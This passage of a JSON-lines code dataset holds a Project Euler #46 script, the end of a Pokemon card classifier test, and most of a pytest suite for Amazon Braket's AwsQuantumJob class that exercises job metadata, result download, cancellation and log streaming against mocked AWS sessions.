self.assertTrue(isinstance(output, CardPredictionResult))\n self.assertEqual(len(output), 2)\n self.assertEqual(output.unique_cards, [17])\n self.assertEqual(len(output.runs), 1)\n self.assertEqual(output.runs[0].interval, Interval(start=0, end=2))\n self.assertEqual(output.runs[0].card_index, 17)\n self.assertEqual(output.input_path, 
None)\n","repo_name":"prateekt/pokemon-card-recognizer","sub_path":"card_recognizer/classifier/test/test_word_classifier.py","file_name":"test_word_classifier.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14201851531","text":"def efficientprime(number):\n if number <= 3:\n return number > 1\n elif number % 2 == 0 or number % 3 == 0:\n return False\n i = 5\n while i ** 2 <= number:\n if number % i == 0 or number % (i + 2) == 0:\n return False\n i += 6\n return True\n\n\nprimes = [2]\n\nfound = False\ni = 9\nwhile not found:\n n = max(primes)\n while max(primes) < i:\n n += 1\n primes.append(n) if efficientprime(n) else None\n\n abides = False\n for prime in primes[:len(primes)-1][::-1]:\n if (((i - prime) / 2) ** 0.5).is_integer():\n abides = True\n break\n\n if not abides:\n result = i\n found = False\n break\n else:\n i += 2\n while efficientprime(i):\n i += 2\n\nprint(\"Result: %s\" % result)\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Project Euler/#46 - Goldbach's Other Conjecture.py","file_name":"#46 - Goldbach's Other Conjecture.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23644741534","text":"import datetime\nimport json\nimport logging\nimport os\nimport re\nimport tarfile\nimport tempfile\nfrom unittest.mock import Mock, patch\n\nimport pytest\nfrom botocore.exceptions import ClientError\n\nfrom braket.aws import AwsQuantumJob, AwsSession\nfrom braket.aws.queue_information import HybridJobQueueInfo\n\n\n@pytest.fixture\ndef aws_session(quantum_job_arn, job_region):\n _aws_session = Mock(spec=AwsSession)\n _aws_session.create_job.return_value = quantum_job_arn\n _aws_session.default_bucket.return_value = \"default-bucket-name\"\n _aws_session.get_default_jobs_role.return_value = \"default-role-arn\"\n _aws_session.construct_s3_uri.side_effect = (\n lambda bucket, *dirs: f\"s3://{bucket}/{'/'.join(dirs)}\"\n )\n\n def fake_copy_session(region):\n _aws_session.region = region\n return _aws_session\n\n _aws_session.copy_session.side_effect = fake_copy_session\n _aws_session.list_keys.return_value = [\"job-path/output/model.tar.gz\"]\n _aws_session.region = job_region\n\n _braket_client_mock = Mock(meta=Mock(region_name=job_region))\n _aws_session.braket_client = _braket_client_mock\n return _aws_session\n\n\n@pytest.fixture\ndef generate_get_job_response():\n def _get_job_response(**kwargs):\n response = {\n \"ResponseMetadata\": {\n \"RequestId\": \"d223b1a0-ee5c-4c75-afa7-3c29d5338b62\",\n \"HTTPStatusCode\": 200,\n },\n \"algorithmSpecification\": {\n \"scriptModeConfig\": {\n \"entryPoint\": \"my_file:start_here\",\n \"s3Uri\": \"s3://amazon-braket-jobs/job-path/my_file.py\",\n }\n },\n \"checkpointConfig\": {\n \"localPath\": \"/opt/omega/checkpoints\",\n \"s3Uri\": \"s3://amazon-braket-jobs/job-path/checkpoints\",\n },\n \"createdAt\": datetime.datetime(2021, 6, 28, 21, 4, 51),\n \"deviceConfig\": {\n \"device\": \"arn:aws:braket:::device/qpu/rigetti/Aspen-10\",\n },\n \"hyperParameters\": {\n \"foo\": \"bar\",\n },\n \"inputDataConfig\": [\n {\n \"channelName\": \"training_input\",\n \"dataSource\": {\n \"s3DataSource\": {\n \"s3Uri\": \"s3://amazon-braket-jobs/job-path/input\",\n }\n },\n }\n ],\n \"instanceConfig\": {\n \"instanceCount\": 1,\n \"instanceType\": \"ml.m5.large\",\n \"volumeSizeInGb\": 1,\n },\n \"jobArn\": 
\"arn:aws:braket:us-west-2:875981177017:job/job-test-20210628140446\",\n \"jobName\": \"job-test-20210628140446\",\n \"outputDataConfig\": {\"s3Path\": \"s3://amazon-braket-jobs/job-path/data\"},\n \"roleArn\": \"arn:aws:iam::875981177017:role/AmazonBraketJobRole\",\n \"status\": \"RUNNING\",\n \"stoppingCondition\": {\"maxRuntimeInSeconds\": 1200},\n }\n response.update(kwargs)\n\n return response\n\n return _get_job_response\n\n\n@pytest.fixture\ndef generate_cancel_job_response():\n def _cancel_job_response(**kwargs):\n response = {\n \"ResponseMetadata\": {\n \"RequestId\": \"857b0893-2073-4ad6-b828-744af8400dfe\",\n \"HTTPStatusCode\": 200,\n },\n \"cancellationStatus\": \"CANCELLING\",\n \"jobArn\": \"arn:aws:braket:us-west-2:875981177017:job/job-test-20210628140446\",\n }\n response.update(kwargs)\n return response\n\n return _cancel_job_response\n\n\n@pytest.fixture\ndef quantum_job_name():\n return \"job-test-20210628140446\"\n\n\n@pytest.fixture\ndef job_region():\n return \"us-west-2\"\n\n\n@pytest.fixture\ndef quantum_job_arn(quantum_job_name, job_region):\n return f\"arn:aws:braket:{job_region}:875981177017:job/{quantum_job_name}\"\n\n\n@pytest.fixture\ndef quantum_job(quantum_job_arn, aws_session):\n return AwsQuantumJob(quantum_job_arn, aws_session)\n\n\ndef test_equality(quantum_job_arn, aws_session, job_region):\n new_aws_session = Mock(region=job_region)\n quantum_job_1 = AwsQuantumJob(quantum_job_arn, aws_session)\n quantum_job_2 = AwsQuantumJob(quantum_job_arn, aws_session)\n quantum_job_3 = AwsQuantumJob(quantum_job_arn, new_aws_session)\n other_quantum_job = AwsQuantumJob(\n \"arn:aws:braket:us-west-2:875981177017:job/other-job\", aws_session\n )\n non_quantum_job = quantum_job_1.arn\n\n assert quantum_job_1 == quantum_job_2\n assert quantum_job_1 == quantum_job_3\n assert quantum_job_1 is not quantum_job_2\n assert quantum_job_1 is not quantum_job_3\n assert quantum_job_1 is quantum_job_1\n assert quantum_job_1 != other_quantum_job\n assert quantum_job_1 != non_quantum_job\n\n\ndef test_hash(quantum_job):\n assert hash(quantum_job) == hash(quantum_job.arn)\n\n\n@pytest.mark.parametrize(\n \"arn, expected_region\",\n [\n (\"arn:aws:braket:us-west-2:875981177017:job/job-name\", \"us-west-2\"),\n (\"arn:aws:braket:us-west-1:1234567890:job/job-name\", \"us-west-1\"),\n ],\n)\n@patch(\"braket.aws.aws_quantum_job.boto3.Session\")\n@patch(\"braket.aws.aws_quantum_job.AwsSession\")\ndef test_quantum_job_constructor_default_session(\n aws_session_mock, mock_session, arn, expected_region\n):\n mock_boto_session = Mock()\n aws_session_mock.return_value = Mock()\n mock_session.return_value = mock_boto_session\n job = AwsQuantumJob(arn)\n mock_session.assert_called_with(region_name=expected_region)\n aws_session_mock.assert_called_with(boto_session=mock_boto_session)\n assert job.arn == arn\n assert job._aws_session == aws_session_mock.return_value\n\n\ndef test_quantum_job_constructor_invalid_region(aws_session):\n region_mismatch = \"The aws session region does not match the region for the supplied arn.\"\n arn = \"arn:aws:braket:unknown-region:875981177017:job/quantum_job_name\"\n with pytest.raises(ValueError, match=region_mismatch):\n AwsQuantumJob(arn, aws_session)\n\n\n@patch(\"braket.aws.aws_quantum_job.boto3.Session\")\ndef test_quantum_job_constructor_explicit_session(mock_session, quantum_job_arn, job_region):\n aws_session_mock = Mock(region=job_region)\n job = AwsQuantumJob(quantum_job_arn, aws_session_mock)\n assert job._aws_session == aws_session_mock\n assert 
job.arn == quantum_job_arn\n mock_session.assert_not_called()\n\n\ndef test_metadata(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n get_job_response_running = generate_get_job_response(status=\"RUNNING\")\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.metadata() == get_job_response_running\n aws_session.get_job.assert_called_with(quantum_job_arn)\n\n get_job_response_completed = generate_get_job_response(status=\"COMPLETED\")\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.metadata() == get_job_response_completed\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 2\n\n\ndef test_metadata_caching(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n get_job_response_running = generate_get_job_response(status=\"RUNNING\")\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.metadata(True) == get_job_response_running\n\n get_job_response_completed = generate_get_job_response(status=\"COMPLETED\")\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.metadata(True) == get_job_response_running\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 1\n\n\ndef test_queue_position(quantum_job, aws_session, generate_get_job_response):\n state_1 = \"COMPLETED\"\n queue_info = {\n \"queue\": \"JOBS_QUEUE\",\n \"position\": \"None\",\n \"message\": \"Job is in COMPLETED status. \"\n \"AmazonBraket does not show queue position for this status.\",\n }\n get_job_response_completed = generate_get_job_response(status=state_1, queueInfo=queue_info)\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.queue_position() == HybridJobQueueInfo(\n queue_position=None, message=queue_info[\"message\"]\n )\n\n state_2 = \"QUEUED\"\n queue_info = {\"queue\": \"JOBS_QUEUE\", \"position\": \"2\"}\n get_job_response_queued = generate_get_job_response(status=state_2, queueInfo=queue_info)\n aws_session.get_job.return_value = get_job_response_queued\n assert quantum_job.queue_position() == HybridJobQueueInfo(queue_position=\"2\", message=None)\n\n\ndef test_state(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n state_1 = \"RUNNING\"\n get_job_response_running = generate_get_job_response(status=state_1)\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.state() == state_1\n aws_session.get_job.assert_called_with(quantum_job_arn)\n\n state_2 = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state_2)\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.state() == state_2\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 2\n\n\ndef test_state_caching(quantum_job, aws_session, generate_get_job_response, quantum_job_arn):\n state_1 = \"RUNNING\"\n get_job_response_running = generate_get_job_response(status=state_1)\n aws_session.get_job.return_value = get_job_response_running\n assert quantum_job.state(True) == state_1\n\n state_2 = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state_2)\n aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.state(True) == state_1\n aws_session.get_job.assert_called_with(quantum_job_arn)\n assert aws_session.get_job.call_count == 1\n\n\n@pytest.fixture()\ndef 
result_setup(quantum_job_name):\n with tempfile.TemporaryDirectory() as temp_dir:\n os.chdir(temp_dir)\n file_path = \"results.json\"\n\n with open(file_path, \"w\") as write_file:\n write_file.write(\n json.dumps(\n {\n \"braketSchemaHeader\": {\n \"name\": \"braket.jobs_data.persisted_job_data\",\n \"version\": \"1\",\n },\n \"dataDictionary\": {\"converged\": True, \"energy\": -0.2},\n \"dataFormat\": \"plaintext\",\n }\n )\n )\n\n with tarfile.open(\"model.tar.gz\", \"w:gz\") as tar:\n tar.add(file_path, arcname=os.path.basename(file_path))\n\n yield\n\n result_dir = f\"{os.getcwd()}/{quantum_job_name}\"\n\n if os.path.exists(result_dir):\n os.remove(f\"{result_dir}/results.json\")\n os.rmdir(f\"{result_dir}/\")\n\n if os.path.isfile(\"model.tar.gz\"):\n os.remove(\"model.tar.gz\")\n\n os.chdir(\"..\")\n\n\n@pytest.mark.parametrize(\"state\", sorted(AwsQuantumJob.TERMINAL_STATES))\ndef test_results_when_job_is_completed(\n quantum_job, aws_session, generate_get_job_response, result_setup, state\n):\n expected_saved_data = {\"converged\": True, \"energy\": -0.2}\n\n get_job_response_completed = generate_get_job_response(status=state)\n quantum_job._aws_session.get_job.return_value = get_job_response_completed\n actual_data = quantum_job.result()\n\n job_metadata = quantum_job.metadata(True)\n s3_path = job_metadata[\"outputDataConfig\"][\"s3Path\"]\n\n output_bucket_uri = f\"{s3_path}/output/model.tar.gz\"\n quantum_job._aws_session.download_from_s3.assert_called_with(\n s3_uri=output_bucket_uri, filename=\"model.tar.gz\"\n )\n assert actual_data == expected_saved_data\n\n\ndef test_download_result_when_job_is_running(\n quantum_job, aws_session, generate_get_job_response, result_setup\n):\n poll_timeout_seconds, poll_interval_seconds, state = 1, 0.5, \"RUNNING\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n\n with pytest.raises(\n TimeoutError,\n match=f\"{job_metadata['jobName']}: Polling for job completion \"\n f\"timed out after {poll_timeout_seconds} seconds.\",\n ):\n quantum_job.download_result(\n poll_timeout_seconds=poll_timeout_seconds, poll_interval_seconds=poll_interval_seconds\n )\n\n\ndef test_download_result_when_extract_path_not_provided(\n quantum_job, generate_get_job_response, aws_session, result_setup\n):\n state = \"COMPLETED\"\n expected_saved_data = {\"converged\": True, \"energy\": -0.2}\n get_job_response_completed = generate_get_job_response(status=state)\n quantum_job._aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n job_name = job_metadata[\"jobName\"]\n quantum_job.download_result()\n\n with open(f\"{job_name}/results.json\", \"r\") as file:\n actual_data = json.loads(file.read())[\"dataDictionary\"]\n assert expected_saved_data == actual_data\n\n\ndef test_download_result_when_extract_path_provided(\n quantum_job, generate_get_job_response, aws_session, result_setup\n):\n expected_saved_data = {\"converged\": True, \"energy\": -0.2}\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n job_name = job_metadata[\"jobName\"]\n\n with tempfile.TemporaryDirectory() as temp_dir:\n quantum_job.download_result(temp_dir)\n\n with open(f\"{temp_dir}/{job_name}/results.json\", \"r\") as file:\n actual_data = 
json.loads(file.read())[\"dataDictionary\"]\n assert expected_saved_data == actual_data\n\n\ndef test_empty_dict_returned_when_result_not_saved(\n quantum_job, generate_get_job_response, aws_session\n):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n\n exception_response = {\n \"Error\": {\n \"Code\": \"404\",\n \"Message\": \"Not Found\",\n }\n }\n quantum_job._aws_session.download_from_s3 = Mock(\n side_effect=ClientError(exception_response, \"HeadObject\")\n )\n assert quantum_job.result() == {}\n\n\ndef test_results_not_in_s3_for_download(quantum_job, generate_get_job_response, aws_session):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n job_metadata = quantum_job.metadata(True)\n output_s3_path = job_metadata[\"outputDataConfig\"][\"s3Path\"]\n\n error_message = f\"Error retrieving results, could not find results at '{output_s3_path}\"\n\n exception_response = {\n \"Error\": {\n \"Code\": \"404\",\n \"Message\": \"Not Found\",\n }\n }\n quantum_job._aws_session.download_from_s3 = Mock(\n side_effect=ClientError(exception_response, \"HeadObject\")\n )\n with pytest.raises(ClientError, match=error_message):\n quantum_job.download_result()\n\n\ndef test_results_raises_error_for_non_404_errors(\n quantum_job, generate_get_job_response, aws_session\n):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n aws_session.get_job.return_value = get_job_response_completed\n\n error = \"An error occurred \\\\(402\\\\) when calling the SomeObject operation: Something\"\n\n exception_response = {\n \"Error\": {\n \"Code\": \"402\",\n \"Message\": \"Something\",\n }\n }\n quantum_job._aws_session.download_from_s3 = Mock(\n side_effect=ClientError(exception_response, \"SomeObject\")\n )\n with pytest.raises(ClientError, match=error):\n quantum_job.result()\n\n\n@patch(\"braket.aws.aws_quantum_job.AwsQuantumJob.download_result\")\ndef test_results_json_file_not_in_tar(\n result_download, quantum_job, aws_session, generate_get_job_response\n):\n state = \"COMPLETED\"\n get_job_response_completed = generate_get_job_response(status=state)\n quantum_job._aws_session.get_job.return_value = get_job_response_completed\n assert quantum_job.result() == {}\n\n\n@pytest.fixture\ndef entry_point():\n return \"test-source-module.entry_point:func\"\n\n\n@pytest.fixture\ndef bucket():\n return \"braket-region-id\"\n\n\n@pytest.fixture(\n params=[\n None,\n \"aws.location/custom-jobs:tag.1.2.3\",\n \"other.uri/custom-name:tag\",\n \"other-custom-format.com\",\n ]\n)\ndef image_uri(request):\n return request.param\n\n\n@pytest.fixture(params=[\"given_job_name\", \"default_job_name\"])\ndef job_name(request):\n if request.param == \"given_job_name\":\n return \"test-job-name\"\n\n\n@pytest.fixture\ndef s3_prefix(job_name):\n return f\"{job_name}/non-default\"\n\n\n@pytest.fixture(params=[\"local_source\", \"s3_source\"])\ndef source_module(request, bucket, s3_prefix):\n if request.param == \"local_source\":\n return \"test-source-module\"\n elif request.param == \"s3_source\":\n return AwsSession.construct_s3_uri(bucket, \"test-source-prefix\", \"source.tar.gz\")\n\n\n@pytest.fixture\ndef role_arn():\n return \"arn:aws:iam::0000000000:role/AmazonBraketInternalSLR\"\n\n\n@pytest.fixture(\n params=[\n 
\"arn:aws:braket:us-west-2::device/qpu/test/device-name\",\n \"arn:aws:braket:::device/qpu/test/device-name\",\n ]\n)\ndef device_arn(request):\n return request.param\n\n\n@pytest.fixture\ndef reservation_arn():\n return \"arn:aws:braket:us-west-2:123456789123:reservation/a1b123cd-45e6-789f-gh01-i234567jk8l9\"\n\n\n@pytest.fixture\ndef prepare_job_args(aws_session, device_arn, reservation_arn):\n return {\n \"device\": device_arn,\n \"source_module\": Mock(),\n \"entry_point\": Mock(),\n \"image_uri\": Mock(),\n \"job_name\": Mock(),\n \"code_location\": Mock(),\n \"role_arn\": Mock(),\n \"hyperparameters\": Mock(),\n \"input_data\": Mock(),\n \"instance_config\": Mock(),\n \"distribution\": Mock(),\n \"stopping_condition\": Mock(),\n \"output_data_config\": Mock(),\n \"copy_checkpoints_from_job\": Mock(),\n \"checkpoint_config\": Mock(),\n \"aws_session\": aws_session,\n \"tags\": Mock(),\n \"reservation_arn\": reservation_arn,\n }\n\n\ndef test_str(quantum_job):\n expected = f\"AwsQuantumJob('arn':'{quantum_job.arn}')\"\n assert str(quantum_job) == expected\n\n\ndef test_arn(quantum_job_arn, aws_session):\n quantum_job = AwsQuantumJob(quantum_job_arn, aws_session)\n assert quantum_job.arn == quantum_job_arn\n\n\ndef test_name(quantum_job_arn, quantum_job_name, aws_session):\n quantum_job = AwsQuantumJob(quantum_job_arn, aws_session)\n assert quantum_job.name == quantum_job_name\n\n\ndef test_no_arn_setter(quantum_job):\n # Python 3.11 error output differs from Python 3.10 <=\n with pytest.raises(AttributeError):\n quantum_job.arn = 123\n\n\n@pytest.mark.parametrize(\"wait_until_complete\", [True, False])\n@patch(\"braket.aws.aws_quantum_job.AwsQuantumJob.logs\")\n@patch(\"braket.aws.aws_quantum_job.prepare_quantum_job\")\ndef test_create_job(\n mock_prepare_quantum_job,\n mock_logs,\n aws_session,\n prepare_job_args,\n quantum_job_arn,\n wait_until_complete,\n):\n test_response_args = {\"testArgs\": \"MyTestArg\"}\n mock_prepare_quantum_job.return_value = test_response_args\n job = AwsQuantumJob.create(wait_until_complete=wait_until_complete, **prepare_job_args)\n mock_prepare_quantum_job.assert_called_with(**prepare_job_args)\n aws_session.create_job.assert_called_with(**test_response_args)\n if wait_until_complete:\n mock_logs.assert_called_once()\n else:\n mock_logs.assert_not_called()\n assert job.arn == quantum_job_arn\n\n\ndef test_create_fake_arg():\n unexpected_kwarg = \"create\\\\(\\\\) got an unexpected keyword argument 'fake_arg'\"\n with pytest.raises(TypeError, match=unexpected_kwarg):\n AwsQuantumJob.create(\n device=\"device\",\n source_module=\"source\",\n fake_arg=\"fake_value\",\n )\n\n\ndef test_cancel_job(quantum_job_arn, aws_session, generate_cancel_job_response):\n cancellation_status = \"CANCELLING\"\n aws_session.cancel_job.return_value = generate_cancel_job_response(\n cancellationStatus=cancellation_status\n )\n quantum_job = AwsQuantumJob(quantum_job_arn, aws_session)\n status = quantum_job.cancel()\n aws_session.cancel_job.assert_called_with(quantum_job_arn)\n assert status == cancellation_status\n\n\ndef test_cancel_job_surfaces_exception(quantum_job, aws_session):\n exception_response = {\n \"Error\": {\n \"Code\": \"ValidationException\",\n \"Message\": \"unit-test-error\",\n }\n }\n error_string = re.escape(\n \"An error occurred (ValidationException) when calling the \"\n \"cancel_job operation: unit-test-error\"\n )\n aws_session.cancel_job.side_effect = ClientError(exception_response, \"cancel_job\")\n with pytest.raises(ClientError, 
match=error_string):\n quantum_job.cancel()\n\n\n@pytest.mark.parametrize(\n \"generate_get_job_response_kwargs\",\n [\n {\n \"status\": \"RUNNING\",\n },\n {\n \"status\": \"COMPLETED\",\n },\n {\n \"status\": \"COMPLETED\",\n \"startedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0),\n },\n {\"status\": \"COMPLETED\", \"endedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0)},\n {\n \"status\": \"COMPLETED\",\n \"startedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0),\n \"endedAt\": datetime.datetime(2021, 1, 1, 1, 0, 0, 0),\n },\n ],\n)\n@patch(\n \"braket.jobs.metrics_data.cwl_insights_metrics_fetcher.\"\n \"CwlInsightsMetricsFetcher.get_metrics_for_job\"\n)\ndef test_metrics(\n metrics_fetcher_mock,\n quantum_job,\n aws_session,\n generate_get_job_response,\n generate_get_job_response_kwargs,\n):\n get_job_response_running = generate_get_job_response(**generate_get_job_response_kwargs)\n aws_session.get_job.return_value = get_job_response_running\n\n expected_metrics = {\"Test\": [1]}\n metrics_fetcher_mock.return_value = expected_metrics\n metrics = quantum_job.metrics()\n assert metrics == expected_metrics\n\n\n@pytest.fixture\ndef log_stream_responses():\n return (\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n \"Message\": \"This shouldn't get raised...\",\n }\n },\n \"DescribeLogStreams\",\n ),\n {\"logStreams\": []},\n {\"logStreams\": [{\"logStreamName\": \"stream-1\"}]},\n )\n\n\n@pytest.fixture\ndef log_events_responses():\n return (\n {\"nextForwardToken\": None, \"events\": [{\"timestamp\": 1, \"message\": \"hi there #1\"}]},\n {\"nextForwardToken\": None, \"events\": []},\n {\n \"nextForwardToken\": None,\n \"events\": [\n {\"timestamp\": 1, \"message\": \"hi there #1\"},\n {\"timestamp\": 2, \"message\": \"hi there #2\"},\n ],\n },\n {\"nextForwardToken\": None, \"events\": []},\n {\n \"nextForwardToken\": None,\n \"events\": [\n {\"timestamp\": 2, \"message\": \"hi there #2\"},\n {\"timestamp\": 2, \"message\": \"hi there #2a\"},\n {\"timestamp\": 3, \"message\": \"hi there #3\"},\n ],\n },\n {\"nextForwardToken\": None, \"events\": []},\n )\n\n\ndef test_logs(\n quantum_job,\n generate_get_job_response,\n log_events_responses,\n log_stream_responses,\n capsys,\n):\n quantum_job._aws_session.get_job.side_effect = (\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"COMPLETED\"),\n )\n quantum_job._aws_session.describe_log_streams.side_effect = log_stream_responses\n quantum_job._aws_session.get_log_events.side_effect = log_events_responses\n\n quantum_job.logs(wait=True, poll_interval_seconds=0)\n\n captured = capsys.readouterr()\n assert captured.out == \"\\n\".join(\n (\n \"..\",\n \"hi there #1\",\n \"hi there #2\",\n \"hi there #2a\",\n \"hi there #3\",\n \"\",\n )\n )\n\n\n@patch.dict(\"os.environ\", {\"JPY_PARENT_PID\": \"True\"})\ndef test_logs_multiple_instances(\n quantum_job,\n generate_get_job_response,\n log_events_responses,\n log_stream_responses,\n capsys,\n):\n quantum_job._aws_session.get_job.side_effect = (\n generate_get_job_response(status=\"RUNNING\", instanceConfig={\"instanceCount\": 2}),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"COMPLETED\"),\n )\n log_stream_responses[-1][\"logStreams\"].append({\"logStreamName\": \"stream-2\"})\n 
quantum_job._aws_session.describe_log_streams.side_effect = log_stream_responses\n\n event_counts = {\n \"stream-1\": 0,\n \"stream-2\": 0,\n }\n\n def get_log_events(log_group, log_stream, start_time, start_from_head, next_token):\n log_events_dict = {\n \"stream-1\": log_events_responses,\n \"stream-2\": log_events_responses,\n }\n log_events_dict[\"stream-1\"] += (\n {\n \"nextForwardToken\": None,\n \"events\": [],\n },\n {\n \"nextForwardToken\": None,\n \"events\": [],\n },\n )\n log_events_dict[\"stream-2\"] += (\n {\n \"nextForwardToken\": None,\n \"events\": [\n {\"timestamp\": 3, \"message\": \"hi there #3\"},\n {\"timestamp\": 4, \"message\": \"hi there #4\"},\n ],\n },\n {\n \"nextForwardToken\": None,\n \"events\": [],\n },\n )\n event_counts[log_stream] += 1\n return log_events_dict[log_stream][event_counts[log_stream]]\n\n quantum_job._aws_session.get_log_events.side_effect = get_log_events\n\n quantum_job.logs(wait=True, poll_interval_seconds=0)\n\n captured = capsys.readouterr()\n assert captured.out == \"\\n\".join(\n (\n \"..\",\n \"\\x1b[34mhi there #1\\x1b[0m\",\n \"\\x1b[35mhi there #1\\x1b[0m\",\n \"\\x1b[34mhi there #2\\x1b[0m\",\n \"\\x1b[35mhi there #2\\x1b[0m\",\n \"\\x1b[34mhi there #2a\\x1b[0m\",\n \"\\x1b[35mhi there #2a\\x1b[0m\",\n \"\\x1b[34mhi there #3\\x1b[0m\",\n \"\\x1b[35mhi there #3\\x1b[0m\",\n \"\\x1b[35mhi there #4\\x1b[0m\",\n \"\",\n )\n )\n\n\ndef test_logs_error(quantum_job, generate_get_job_response, capsys):\n quantum_job._aws_session.get_job.side_effect = (\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"COMPLETED\"),\n )\n quantum_job._aws_session.describe_log_streams.side_effect = (\n ClientError(\n {\n \"Error\": {\n \"Code\": \"UnknownCode\",\n \"Message\": \"Some error message\",\n }\n },\n \"DescribeLogStreams\",\n ),\n )\n\n with pytest.raises(ClientError, match=\"Some error message\"):\n quantum_job.logs(wait=True, poll_interval_seconds=0)\n\n\ndef test_initialize_session_for_valid_non_regional_device(aws_session, caplog):\n device_arn = \"arn:aws:braket:::device/qpu/test/device-name\"\n first_region = aws_session.region\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n ),\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n ),\n device_arn,\n ]\n\n caplog.set_level(logging.INFO)\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n assert f\"Changed session region from '{first_region}' to '{aws_session.region}'\" in caplog.text\n\n\ndef test_initialize_session_for_valid_regional_device(aws_session, caplog):\n device_arn = f\"arn:aws:braket:{aws_session.region}::device/qpu/test/device-name\"\n logger = logging.getLogger(__name__)\n aws_session.get_device.return_value = device_arn\n caplog.set_level(logging.INFO)\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n assert not caplog.text\n\n\n@pytest.mark.parametrize(\n \"get_device_side_effect, expected_exception\",\n [\n (\n [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n )\n ],\n ValueError,\n ),\n (\n [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ThrottlingException\",\n }\n },\n \"getDevice\",\n )\n ],\n ClientError,\n ),\n ],\n)\ndef test_regional_device_raises_error(\n get_device_side_effect, 
expected_exception, aws_session, caplog\n):\n device_arn = f\"arn:aws:braket:{aws_session.region}::device/qpu/test/device-name\"\n aws_session.get_device.side_effect = get_device_side_effect\n logger = logging.getLogger(__name__)\n caplog.set_level(logging.INFO)\n with pytest.raises(expected_exception):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n aws_session.get_device.assert_called_with(device_arn)\n assert not caplog.text\n\n\ndef test_regional_device_switches(aws_session, caplog):\n original_region = aws_session.region\n device_region = \"us-east-1\"\n device_arn = f\"arn:aws:braket:{device_region}::device/qpu/test/device-name\"\n mock_session = Mock()\n mock_session.get_device.side_effect = device_arn\n aws_session.copy_session.side_effect = [mock_session]\n logger = logging.getLogger(__name__)\n caplog.set_level(logging.INFO)\n\n assert mock_session == AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n aws_session.copy_session.assert_called_with(region=device_region)\n mock_session.get_device.assert_called_with(device_arn)\n assert f\"Changed session region from '{original_region}' to '{device_region}'\" in caplog.text\n\n\ndef test_initialize_session_for_invalid_device(aws_session, device_arn):\n logger = logging.getLogger(__name__)\n aws_session.get_device.side_effect = ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n )\n\n device_not_found = f\"'{device_arn}' not found.\"\n with pytest.raises(ValueError, match=device_not_found):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\ndef test_no_region_routing_simulator(aws_session):\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n )\n\n device_arn = \"arn:aws:braket:::device/simulator/test/device-name\"\n device_not_found = f\"Simulator '{device_arn}' not found in 'us-west-2'\"\n with pytest.raises(ValueError, match=device_not_found):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\ndef test_exception_in_credentials_session_region(device_arn, aws_session):\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = ClientError(\n {\n \"Error\": {\n \"Code\": \"SomeOtherErrorMessage\",\n }\n },\n \"getDevice\",\n )\n\n error_message = (\n \"An error occurred \\\\(SomeOtherErrorMessage\\\\) \"\n \"when calling the getDevice operation: Unknown\"\n )\n with 